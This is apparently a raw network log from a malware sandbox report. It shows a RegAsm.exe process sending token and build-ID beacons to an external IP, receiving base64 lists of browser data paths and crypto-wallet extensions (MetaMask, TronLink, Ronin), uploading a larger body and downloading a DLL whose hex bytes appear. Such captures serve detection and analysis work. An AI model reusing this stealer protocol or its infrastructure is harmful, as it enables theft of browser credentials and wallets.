2024-09-26 22:15:45 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|66a0b9836ae5d0ace259ecc9edf06257\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49734	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:46 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:46 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 46 48 44 47 44 47 48 44 47 43 42 46 43 46 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------IDBAFHDGDGHDGCBFCFIDContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------IDBAFHDGDGHDGCBFCFIDCont
2024-09-26 22:15:47 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:47 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49735	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:47 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:47 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 48 43 46 49 45 43 42 47 43 42 46 48 49 4a 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------CFIEHCFIECBGCBFHIJJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------CFIEHCFIECBGCBFHIJJKCont
2024-09-26 22:15:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:48 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49736	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:49 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:49 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DBFBFBGDBKJJKFIEHJDBCont
2024-09-26 22:15:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:49 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49737	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:50 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBGDHIEBFHCBFHDHDH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6953 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:50 UTC	6953	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 30 62 39 38 33 36 61 65 35 64 30 61 63 65 32 35 39 65 63 63 39 65 64 66 30 36 32 35 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 47 44 48 49 45 42 46 48 43 42 46 48 44 48 44 48 0d 0a 43 6f 6e 74 Data Ascii: ------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="token"66a0b9836ae5d0ace259ecc9edf06257------DHCBGDHIEBFHCBFHDHDHContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------DHCBGDHIEBFHCBFHDHDHCont
2024-09-26 22:15:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:51 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49738	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:51 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:52 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:51 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:15:51 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:15:52 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-09-26 22:15:52 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49739	5.75.211.162	443	528	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:55 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 829 Connection: Keep-Alive Cache-Control: no-cache
